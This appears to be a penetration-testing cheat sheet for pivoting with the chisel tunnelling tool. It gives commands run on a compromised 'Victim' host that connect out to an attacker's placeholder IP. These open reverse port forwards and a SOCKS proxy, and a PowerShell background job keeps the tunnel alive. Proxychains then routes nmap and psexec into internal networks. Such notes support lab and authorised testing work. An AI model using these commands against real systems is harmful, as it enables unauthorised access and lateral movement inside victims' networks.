Remote Port Forwarding (Opening an Internal port to us)
Transfer chisel to Victim
# Proxychains # In end, append 'socks5 1080' in end of file.
# For HTML you will have to append 'html 1080' at the end of the file.
nano /etc/proxychains4.conf
# On Victim # Only Change Kali IP and port 445 as a port you want to open up.
./chisel.exe client <KALI IP>:1337 R:1080:<445>
# To run above in background # change location of chisel.exe, and 80 to desired port
$scriptBlock = { Start-Process C:\Users\viewer\Desktop\chisel.exe -ArgumentList @('client','<ATTACKERs IP>:1337','R:<Vitctim IP>:80') }
Start-Job -ScriptBlock $scriptBlock
# On Attacking # All values Static here
./chisel server -p 1337 --reverse &
-> Use and Port 1080 for Scanning and further enumeration.
Reverse Socks Proxy (Pivoting to Other Network)
Transfer Chisel to the Victim machine
./chisel client <KALI IP>:1337 R:socks &
# On Victim but Without losing shell
$scriptBlock = { Start-Process C:\users\public\chisel.exe -ArgumentList @('client','<ATTACKERs IP>:1337','R:1080:socks') }
Start-Job -ScriptBlock $scriptBlock
# ON Attacking
./chisel server -p 1337 --reverse --socks5 # without background job
./chisel server -p 1337 --reverse --socks5 & # Use this when using proxychain
# Start enumerating using proxychains nmap <IP>, etc commands.
Now for other networks try:
proxychains nmap, proxychains psexec, proxychains dirbuster, etc
try everything just with proxychains command once you get access to another network